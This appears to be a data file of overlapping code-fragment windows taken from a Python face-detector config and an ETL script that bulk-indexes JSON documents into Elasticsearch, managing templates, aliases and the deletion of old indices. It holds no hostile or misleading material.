[ "<reponame>binhmuc/faced import os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288", "MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9", "= os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE", "os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET =", "\"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE = 50", "import os MODELS_PATH = os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET", "os.path.join(os.path.dirname(__file__), \"models\") YOLO_SIZE = 288 YOLO_TARGET = 9 CORRECTOR_SIZE =" ]
[ "es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name =", "logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if document_type in", "delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config,", "logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name,", "in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name,", "class ElasticSearchException(Exception): pass # Init Elasticsearch and test connection def", "index_name, file_path, logger) logger.info(\"Creating index aliases and deleting old indices...\")", "get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED", "config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}'", "= os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name))", "BrAPI extraction and Elasticsearch document transformation' ' before trying to", "document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType':", "import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template", "bulk_dir) sources = config['sources'] for (source_name, source) in sources.items(): source_bulk_dir", "logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index", "+ '-d*', params={'h': 'index'}) index_names = list(map(lambda i: i['index'], indices))", "= dict() logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time())", "= source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir,", "json bulk folder found in ' + bulk_dir) sources =", "alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name))", "directory: \\'{}\\'.\\n' 'Please make sure you have run the BrAPI", "get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config", "cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e:", "list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types", "# Load json bulk files into elasticsearch import json import", "{'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] =", "= elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node \"{}\"", "file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating", "try: 
if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or", "os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with", "in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception", "template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger):", "logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time()) for document_type", "'-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template", "load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\"", "body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\"", "index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases", "Elasticsearch documents.\\n\" \"=> Check the logs ({}) for more details.\"", "index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path in", "= load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict()", "from etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger,", "replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type,", "def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger):", "main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not", "def create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' +", "bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file", "get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init", "extraction and Elasticsearch document transformation' ' before trying to launch", "base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] =", "create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name", "run the BrAPI extraction and Elasticsearch document transformation' ' before", "'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name,", "folder found in ' + bulk_dir) sources = config['sources'] for", "+ bulk_dir) sources = config['sources'] for (source_name, source) in sources.items():", "mapping...\") timestamp = int(time.time()) for document_type in document_types: base_index_name =", "to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url))", "pass # Init Elasticsearch and test connection def init_es_client(url, logger):", "create_template(es_client, load_config, 
document_type, base_index_name, logger) index_name = base_index_name + '-d'", "or directory: \\'{}\\'.\\n' 'Please make sure you have run the", "in bulk_files: if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type]", "for document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'],", "base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h':", "file_path, logger) logger.info(\"Creating index aliases and deleting old indices...\") for", "transformation' ' before trying to launch the transformation process.' .format(source_bulk_dir))", "in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client,", "'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger", "index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names def", "document transformation' ' before trying to launch the transformation process.'", "document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index,", "template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern,", "import time import traceback import elasticsearch from etl.common.store import list_entity_files", "all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types", "e return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def", "import elasticsearch from etl.common.store import list_entity_files from etl.common.utils import get_folder_path,", "base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading", "def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing", "index_by_document = dict() logger.info(\"Preparing index with template mapping...\") timestamp =", "check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path)", "base_index_name template_pattern = base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if", "indexing...\") for document_type, file_path in bulk_files: if document_type in index_by_document:", "index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents", "of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as", "Exception('No json bulk folder found in ' + bulk_dir) sources", "such file or directory: \\'{}\\'.\\n' 'Please make sure you have", "url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable on", "es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node", "= base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type]", "def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: 
info = es_client.info()", "init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if", "source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file =", "index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and deleting", "= get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose'])", "\"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name =", "bulk_files: if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client,", "not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n'", "Load json bulk files into elasticsearch import json import os", "index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name", "list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template class", "index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name))", "{'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger)", "logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path", "= int(time.time()) for document_type in document_types: base_index_name = replace_template( load_config['index-template'],", "document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path,", "es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url']))", "logger.info(\"Creating index aliases and deleting old indices...\") for document_type, (base_index_name,", "os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n' 'Please", "({}) for more details.\" .format(source_name, log_file)) def main(config): log_dir =", "base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern = base_index_name", "i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir):", "bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types')", "documents.\\n\" \"=> Check the logs ({}) for more details.\" .format(source_name,", "\"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings':", "(base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices", "except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease", "logger.debug(getattr(e, 
'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check", "raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name))", "log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name, log_file,", "\"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file:", "base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name +", "base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if", "return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch", "found in ' + bulk_dir) sources = config['sources'] for (source_name,", "= config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch", "= 'template_elixir_' + base_index_name template_pattern = base_index_name + '-d*' mapping", "base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index", "logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def", "dict() logger.info(\"Preparing index with template mapping...\") timestamp = int(time.time()) for", "logger) logger.info(\"Creating index aliases and deleting old indices...\") for document_type,", "check your configuration'.format(url)) raise e return es_client def check_error(response): if", "info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch unavailable", "mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern)) template_body", "source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name", "file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name,", "logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not", "= get_indices(es_client, base_index_name) for old_index in old_indices[1:]: delete_index(es_client, old_index, logger)", "import get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass #", "elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected to node \"{}\" of", "document_type, base_index_name, logger) index_name = base_index_name + '-d' + str(timestamp)", "logs ({}) for more details.\" .format(source_name, log_file)) def main(config): log_dir", "more details.\" .format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir", "into elasticsearch import json import os import time import traceback", "= es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template \"{}\" on", "'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name,", 
"return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client,", "i: i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir,", "# Init Elasticsearch and test connection def init_es_client(url, logger): es_client", "log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading", "= document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with template mapping...\")", "logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the logs ({})", "logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index", "if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def", "indices...\") for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name,", "\"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping} if 'index-settings'", "transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files))", "config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir,", "on \"{}\".\\nPlease check your configuration'.format(url)) raise e return es_client def", "\"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms'))", "logger.debug('Bulk indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path,", "index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating", "check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating", "file or directory: \\'{}\\'.\\n' 'Please make sure you have run", "'index'}) index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names", "index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\"", "create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name,", "\"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name):", "unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e return es_client", "json bulk files into elasticsearch import json import os import", "source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger = create_logger(source_name,", "base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name) for old_index in", "index_name, logger) 
index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\") for document_type,", "file_path in bulk_files: if document_type in index_by_document: base_index_name, index_name =", "'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the", "trying to launch the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir))", "template_body = {'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config:", "= base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping:", "the logs ({}) for more details.\" .format(source_name, log_file)) def main(config):", "+ '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating", "load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger) logger.info(\"Loading '{}' into", "es_config, document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern", "= es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name", "template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings']", "timestamp = int(time.time()) for document_type in document_types: base_index_name = replace_template(", "in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source, config, source_bulk_dir, log_dir)", "try: info = es_client.info() logger.debug('Connected to node \"{}\" of cluster", "{}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED", "bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json", "logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client =", "documents indexing \"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' +", "'{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such", "log_file)) def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk')", "on pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping}", "index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices =", "mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return logger.debug('Creating template \"{}\"", "get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch", "es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda i: i['index'],", "or all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index", "'')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\" \"=> Check the logs", "Exception as e: logger.debug(traceback.format_exc()) 
logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {}", "old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc())", "logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message',", "e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url))", "int(time.time()) for document_type in document_types: base_index_name = replace_template( load_config['index-template'], {'source':", "def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index", "have run the BrAPI extraction and Elasticsearch document transformation' '", "= config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise", "indexing \"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name", "load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name,", "check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias", "es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body)) def bulk_index(es_client, index_name, file_path,", "for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices", "recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client", "on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error:", ".format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types =", "elasticsearch import json import os import time import traceback import", "'-d' + str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name", "index aliases and deleting old indices...\") for document_type, (base_index_name, index_name)", "bulk folder found in ' + bulk_dir) sources = config['sources']", "for document_type, file_path in bulk_files: if document_type in index_by_document: base_index_name,", "+ source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True) logger =", "= create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'],", "check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger): template_name = 'template_elixir_'", "{} Elasticsearch documents.\\n\" \"=> Check the logs ({}) for more", "\"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection", "create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = get_indices(es_client, base_index_name) for", 
"check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*',", "if document_type in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name,", "and test connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try:", "indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda", "\"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name))", "not os.path.exists(bulk_dir): raise Exception('No json bulk folder found in '", "indices)) index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\"", "document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document =", "node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except", "into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError(", "info = es_client.info() logger.debug('Connected to node \"{}\" of cluster \"{}\"", "source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action],", "mapping} if 'index-settings' in es_config: template_body['settings'] = es_config['index-settings'] check_error(es_client.indices.put_template(name=template_name, body=template_body))", "import traceback import elasticsearch from etl.common.store import list_entity_files from etl.common.utils", "= 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log', recreate=True)", "\"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError as e: logger.error('Connection error: Elasticsearch", "process.' 
.format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types", "logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting", ".format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'],", "and Elasticsearch document transformation' ' before trying to launch the", "Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier'] action =", "index_names.sort(reverse=True) return index_names def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full", "ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch']", "logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name))", "raise Exception('No json bulk folder found in ' + bulk_dir)", "\"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'], url)) except elasticsearch.exceptions.ConnectionError", "your configuration'.format(url)) raise e return es_client def check_error(response): if response.get('errors'):", "if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file or directory:", "elasticsearch from etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path,", "document_type, file_path in bulk_files: if document_type in index_by_document: base_index_name, index_name", "def main(config): log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if", "\"\"\" source_name = source['schema:identifier'] action = 'load-elasticsearch-' + source_name log_file", "set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types)", "document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name = base_index_name", "= os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No json bulk", "= set(map(first, bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types =", "json import os import time import traceback import elasticsearch from", "you have run the BrAPI extraction and Elasticsearch document transformation'", "as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch", "old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except Exception as", "os import time import traceback import elasticsearch from etl.common.store import", "bulk files into elasticsearch import json import os import time", "config['sources'] for (source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name])", "+ str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk", "if not mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name,", "connection def init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: 
info =", "and deleting old indices...\") for document_type, (base_index_name, index_name) in index_by_document.items():", "in ' + bulk_dir) sources = config['sources'] for (source_name, source)", "etl.common.store import list_entity_files from etl.common.utils import get_folder_path, get_file_path, create_logger, first,", "config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir): raise Exception('No", "replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch and test connection", "es_client.info() logger.debug('Connected to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'],", "base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not mapping: return", "os.path.exists(bulk_dir): raise Exception('No json bulk folder found in ' +", "error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e", "not mapping: return logger.debug('Creating template \"{}\" on pattern \"{}\"...'.format(template_name, template_pattern))", "log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier']", "action], ext='.log', recreate=True) logger = create_logger(source_name, log_file, config['options']['verbose']) load_config =", "config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name", "= {'template': template_pattern, 'mappings': mapping} if 'index-settings' in es_config: template_body['settings']", "alias \"{}\" for index \"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client,", "action = 'load-elasticsearch-' + source_name log_file = get_file_path([log_dir, action], ext='.log',", "old_index in old_indices[1:]: delete_index(es_client, old_index, logger) logger.info(\"SUCCEEDED Loading {}.\".format(source_name)) except", "load_config, document_type, base_index_name, logger) index_name = base_index_name + '-d' +", "def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'})", "response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name))", "= es_client.cat.indices(base_index_name + '-d*', params={'h': 'index'}) index_names = list(map(lambda i:", "body=template_body)) def bulk_index(es_client, index_name, file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk", "'Please make sure you have run the BrAPI extraction and", "to launch the transformation process.' 
